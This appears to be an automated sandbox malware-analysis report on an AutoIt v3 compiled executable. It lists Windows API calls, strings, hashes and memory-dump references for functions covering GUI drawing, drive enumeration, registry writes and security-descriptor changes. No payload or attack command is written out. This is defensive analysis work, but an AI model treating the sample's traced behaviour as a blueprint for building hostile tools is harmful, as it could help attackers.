DeleteDC.GDI32(00000000), ref: 001A299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001A29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 001A29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001A2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001A2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 001A2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001A2A77
GetStockObject.GDI32(00000011), ref: 001A2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001A2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001A2A97

Strings

AutoIt v3, xrefs: 001A28F8
msctls_progress32, xrefs: 001A2A13
DISPLAY, xrefs: 001A295A
static, xrefs: 001A294F, 001A2A71

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 7ab551c60beff9cbf1b8cb88d98493027a932679e33a635ecf87ced6643cb8dd
Instruction ID: 5edbee69bcf63aea96ed376f09cc3a6da2a6e67ec2ad56d537ea89647ffc4485
Opcode Fuzzy Hash: 7ab551c60beff9cbf1b8cb88d98493027a932679e33a635ecf87ced6643cb8dd
Instruction Fuzzy Hash: 60B14A75A00215BFEB14DFA8DC89EAEBBA9FB59710F004214F915EB690D774AD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00194ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00194AED
GetDriveTypeW.KERNEL32(?,001BCB68,?,\\.\,001BCC08), ref: 00194BCA
SetErrorMode.KERNEL32(00000000,001BCB68,?,\\.\,001BCC08), ref: 00194D36

Strings

1394, xrefs: 00194C9F
SATA, xrefs: 00194CD0
PhysicalDrive, xrefs: 00194B76
Removable, xrefs: 00194C10, 00194C15
Virtual, xrefs: 00194CE5
ATA, xrefs: 00194C98
RAID, xrefs: 00194CBB
SSA, xrefs: 00194CA6
FileBackedVirtual, xrefs: 00194CEC
Unknown, xrefs: 00194BED, 00194C83
SCSI, xrefs: 00194C8A
RAMDisk, xrefs: 00194BF4
Network, xrefs: 00194C02
Fixed, xrefs: 00194C09
USB, xrefs: 00194CB4
CDROM, xrefs: 00194BFB
SAS, xrefs: 00194CC9
\\.\, xrefs: 00194B3F
Fibre, xrefs: 00194CAD
ATAPI, xrefs: 00194C91
SSD, xrefs: 00194C4A
iSCSI, xrefs: 00194CC2
MMC, xrefs: 00194CDE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 914bc3db1309bc937ddb1606c9dc5808a40ad2093f28061efb397d606033fec5
Instruction ID: 42aaae9a6191e4b0e4d55ce0f82e833a998dd18872464e12f6d9cf00e143bcc4
Opcode Fuzzy Hash: 914bc3db1309bc937ddb1606c9dc5808a40ad2093f28061efb397d606033fec5
Instruction Fuzzy Hash: 5D61E030605649DFCF08DF69DA82D6DB7B0BF28380BA48055F806AB691DB35ED42DB81

Uniqueness

Uniqueness Score: -1.00%

Function 001B73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 001B7421
SetTextColor.GDI32(?,?), ref: 001B7425
GetSysColorBrush.USER32(0000000F), ref: 001B743B
GetSysColor.USER32(0000000F), ref: 001B7446
CreateSolidBrush.GDI32(?), ref: 001B744B
GetSysColor.USER32(00000011), ref: 001B7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 001B7471
SelectObject.GDI32(?,00000000), ref: 001B7482
SetBkColor.GDI32(?,00000000), ref: 001B748B
SelectObject.GDI32(?,?), ref: 001B7498
InflateRect.USER32(?,000000FF,000000FF), ref: 001B74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001B74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 001B74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001B752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001B7554
InflateRect.USER32(?,000000FD,000000FD), ref: 001B7572
DrawFocusRect.USER32(?,?), ref: 001B757D
GetSysColor.USER32(00000011), ref: 001B758E
SetTextColor.GDI32(?,00000000), ref: 001B7596
DrawTextW.USER32(?,001B70F5,000000FF,?,00000000), ref: 001B75A8
SelectObject.GDI32(?,?), ref: 001B75BF
DeleteObject.GDI32(?), ref: 001B75CA
SelectObject.GDI32(?,?), ref: 001B75D0
DeleteObject.GDI32(?), ref: 001B75D5
SetTextColor.GDI32(?,?), ref: 001B75DB
SetBkColor.GDI32(?,?), ref: 001B75E5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 711068395a315506f36f3b575e4053e6284d5126b6d53be8583fad284c765be5
Instruction ID: 2710bece66ac9bfab409d7c4091621725842047d6d849ac57e49c3521d4aa3d8
Opcode Fuzzy Hash: 711068395a315506f36f3b575e4053e6284d5126b6d53be8583fad284c765be5
Instruction Fuzzy Hash: 9A614E72904218AFDF119FA8DC49EEE7FB9EB48320F114215F915BB2E1D7749980CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001B1128
GetDesktopWindow.USER32 ref: 001B113D
GetWindowRect.USER32(00000000), ref: 001B1144
GetWindowLongW.USER32(?,000000F0), ref: 001B1199
DestroyWindow.USER32(?), ref: 001B11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001B11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001B120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001B121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 001B1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001B1245
IsWindowVisible.USER32(00000000), ref: 001B12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001B12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001B12D0
GetWindowRect.USER32(00000000,?), ref: 001B12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 001B130E
GetMonitorInfoW.USER32(00000000,?), ref: 001B1328
CopyRect.USER32(?,?), ref: 001B133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 001B13AA

Strings

(, xrefs: 001B131B
0, xrefs: 001B10D3
tooltips_class32, xrefs: 001B11E6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f950bdfd0e60f815b4f717c26da191338639fd1a12f29a337143e271a75d84e0
Instruction ID: 04a2d68bdf00be5fa519ca9c783fd7ed85745ef0548c8dcd2c642dc00a224aed
Opcode Fuzzy Hash: f950bdfd0e60f815b4f717c26da191338639fd1a12f29a337143e271a75d84e0
Instruction Fuzzy Hash: ECB19C71608351AFD714DF68D894FAABBE4FF88350F408918F9999B2A1D731E844CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00138891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00138968
GetSystemMetrics.USER32(00000007), ref: 00138970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013899B
GetSystemMetrics.USER32(00000008), ref: 001389A3
GetSystemMetrics.USER32(00000004), ref: 001389C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001389E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001389F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00138A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00138A3C
GetClientRect.USER32(00000000,000000FF), ref: 00138A5A
GetStockObject.GDI32(00000011), ref: 00138A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00138A81

Part of subcall function 0013912D: GetCursorPos.USER32(?), ref: 00139141
Part of subcall function 0013912D: ScreenToClient.USER32(00000000,?), ref: 0013915E
Part of subcall function 0013912D: GetAsyncKeyState.USER32(00000001), ref: 00139183
Part of subcall function 0013912D: GetAsyncKeyState.USER32(00000002), ref: 0013919D

SetTimer.USER32(00000000,00000000,00000028,001390FC), ref: 00138AA8

Strings

AutoIt v3 GUI, xrefs: 00138A20

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b5e1d0626ab9599b4caa19baaa3f7b9f58b24daa0263fec71554774420386fa0
Instruction ID: 62dc72db3e4ae46ae2b23861837cd1dc4c17be2e045fbe2c03c85993082d3994
Opcode Fuzzy Hash: b5e1d0626ab9599b4caa19baaa3f7b9f58b24daa0263fec71554774420386fa0
Instruction Fuzzy Hash: A7B16D71A00209EFDB18DFA8CD45BAE7BB5FB48354F114229FA15A7290DB74E880CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00180D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00181114
Part of subcall function 001810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181120
Part of subcall function 001810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 0018112F
Part of subcall function 001810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00180B9B,?,?,?), ref: 00181136
Part of subcall function 001810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0018114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00180DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00180E29
GetLengthSid.ADVAPI32(?), ref: 00180E40
GetAce.ADVAPI32(?,00000000,?), ref: 00180E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00180E96
GetLengthSid.ADVAPI32(?), ref: 00180EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00180EB5
HeapAlloc.KERNEL32(00000000), ref: 00180EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00180EDD
CopySid.ADVAPI32(00000000), ref: 00180EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00180F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00180F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00180F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F6E
HeapFree.KERNEL32(00000000), ref: 00180F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F7E
HeapFree.KERNEL32(00000000), ref: 00180F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00180F8E
HeapFree.KERNEL32(00000000), ref: 00180F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00180FA1
HeapFree.KERNEL32(00000000), ref: 00180FA8

Part of subcall function 00181193: GetProcessHeap.KERNEL32(00000008,00180BB1,?,00000000,?,00180BB1,?), ref: 001811A1
Part of subcall function 00181193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00180BB1,?), ref: 001811A8
Part of subcall function 00181193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00180BB1,?), ref: 001811B7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 417ccc608fa50fd07bca864b13a7ad1b088ea3ea47ade55a4aca586c3e767b2e
Instruction ID: 6590e28977be29a37a47dafd313b114c40bf9150146b6cc456ed67aa14b2cad5
Opcode Fuzzy Hash: 417ccc608fa50fd07bca864b13a7ad1b088ea3ea47ade55a4aca586c3e767b2e
Instruction Fuzzy Hash: 3E71507290020AEBDF61AFA4DC44FAEBBB8BF08350F148215FA55E6151D7719A49CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001AC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,001BCC08,00000000,?,00000000,?,?), ref: 001AC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001AC5A4
_wcslen.LIBCMT ref: 001AC5F4
_wcslen.LIBCMT ref: 001AC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001AC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001AC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001AC84D
RegCloseKey.ADVAPI32(?), ref: 001AC881
RegCloseKey.ADVAPI32(00000000), ref: 001AC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001AC960

Strings

REG_DWORD, xrefs: 001AC804
REG_BINARY, xrefs: 001AC913
REG_EXPAND_SZ, xrefs: 001AC5CD
REG_SZ, xrefs: 001AC644
REG_MULTI_SZ, xrefs: 001AC6F5
REG_QWORD, xrefs: 001AC8C3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 8d84749499460c7ff664a9e310a687789259c357908cbc9ba73ecbfc20ad7c1a
Instruction ID: a7a00b570217add46d78fa6db2a2643162406dec2d197afef2ee557289247fdd
Opcode Fuzzy Hash: 8d84749499460c7ff664a9e310a687789259c357908cbc9ba73ecbfc20ad7c1a
Instruction Fuzzy Hash: 741258396042119FDB14DF24D881A2AB7E5FF89714F15889CF88A9B3A2DB31ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001B091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001B09C6
_wcslen.LIBCMT ref: 001B0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001B0A54
_wcslen.LIBCMT ref: 001B0A8A
_wcslen.LIBCMT ref: 001B0B06
_wcslen.LIBCMT ref: 001B0B81

Part of subcall function 0013F9F2: _wcslen.LIBCMT ref: 0013F9FD

Part of subcall function 00182BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00182BFA

Strings

ISCHECKED, xrefs: 001B0CE1
GETITEMCOUNT, xrefs: 001B0C1E
SELECT, xrefs: 001B0D11
GETSELECTED, xrefs: 001B0C4E
EXPAND, xrefs: 001B0BF8
UNCHECK, xrefs: 001B0D3E
EXISTS, xrefs: 001B0B7C, 001B0B97
GETTOTALCOUNT, xrefs: 001B09F2, 001B0A17
COLLAPSE, xrefs: 001B0B01, 001B0B1C
GETTEXT, xrefs: 001B0C97
CHECK, xrefs: 001B0A85, 001B0AA0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 811aa53c30dd6738fd5562bed8b03e46a448624c06639b823146b6527b4ce9aa
Instruction ID: 8709f2a4753befc3fd2a3e2f5a160eba39ab17771e1fcd66d7f7d3e902de2e59
Opcode Fuzzy Hash: 811aa53c30dd6738fd5562bed8b03e46a448624c06639b823146b6527b4ce9aa
Instruction Fuzzy Hash: 06E1AA352087018FC715EF24C55096BB7E1BFA8308F15895CF89AAB3A2DB30ED46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001AC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
_wcslen.LIBCMT ref: 001AC9F1
_wcslen.LIBCMT ref: 001ACA68
_wcslen.LIBCMT ref: 001ACA9E
_wcslen.LIBCMT ref: 001ACAF9
_wcslen.LIBCMT ref: 001ACB2F
_wcslen.LIBCMT ref: 001ACB7F

Strings

HKEY_CLASSES_ROOT, xrefs: 001ACAF3, 001ACAF8
HKEY_CURRENT_USER, xrefs: 001ACBBD
HKCU, xrefs: 001ACBCE
HKU, xrefs: 001ACBF0
HKCR, xrefs: 001ACB29, 001ACB2E
HKCC, xrefs: 001ACBAC
HKLM, xrefs: 001ACA98, 001ACA9D
HKEY_USERS, xrefs: 001ACBDF
HKEY_CURRENT_CONFIG, xrefs: 001ACB79, 001ACB7E
HKEY_LOCAL_MACHINE, xrefs: 001ACA62, 001ACA67

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: d84048233860ce776f8bbfa33112f4342f1bb5601caf041db3ec0d18ef6fc756
Instruction ID: bf97e85639bc60b6f669fd3be8852b60b0ec01ece5e9c9aa7804a9dcba677516
Opcode Fuzzy Hash: d84048233860ce776f8bbfa33112f4342f1bb5601caf041db3ec0d18ef6fc756
Instruction Fuzzy Hash: 7671F93AA0056A8BCB10DE7CD9516BF3391AFB67A4F150528F856AB284F731CD85C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 001B833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001B835A
_wcslen.LIBCMT ref: 001B836E
_wcslen.LIBCMT ref: 001B8391
_wcslen.LIBCMT ref: 001B83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001B83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,001B361A,?), ref: 001B844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001B8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001B84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001B8501
FreeLibrary.KERNEL32(?), ref: 001B850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001B851D
DestroyIcon.USER32(?), ref: 001B852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001B8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001B8555

Strings

.dll, xrefs: 001B83AB
.icl, xrefs: 001B8368
.exe, xrefs: 001B8388

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 5a76d08b08ce3088e968d35b6673c847f6c849b3b993f1e0c4b8dae2e3ef0035
Instruction ID: e07dc53073f0e424b712b77b0c64a767fe57bddcc666b6de0c82159983c2c7a4
Opcode Fuzzy Hash: 5a76d08b08ce3088e968d35b6673c847f6c849b3b993f1e0c4b8dae2e3ef0035
Instruction Fuzzy Hash: 2161CE71500615BBEB24DF64DC81BFE77ACBB18B21F104609F815E61E1DF74AA90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00127778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-start, xrefs: 0012785F, 001278B1
Bad directive syntax error, xrefs: 0016519A
#ce, xrefs: 001278ED
Cannot parse #include, xrefs: 00165279
#pragma compile, xrefs: 001277D3
#cs, xrefs: 00127873, 001278C5
", xrefs: 00165153
#OnAutoItStartRegister, xrefs: 00127817
Unterminated group of comments, xrefs: 0016528C
', xrefs: 00165169
#include-once, xrefs: 0012782F
#requireadmin, xrefs: 001277FF
#comments-end, xrefs: 001278D9
#include, xrefs: 00127847
#notrayicon, xrefs: 001277E7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: e24aa8a35aa4bd79d5bf97e43f64d4cb540e8ad1add906a84e01c2ec1b1ca64a
Instruction ID: 30e85ff65a02b1ba9b18660bbb43f1db2fca9e5376d2ca8abcbdeff3f23945db
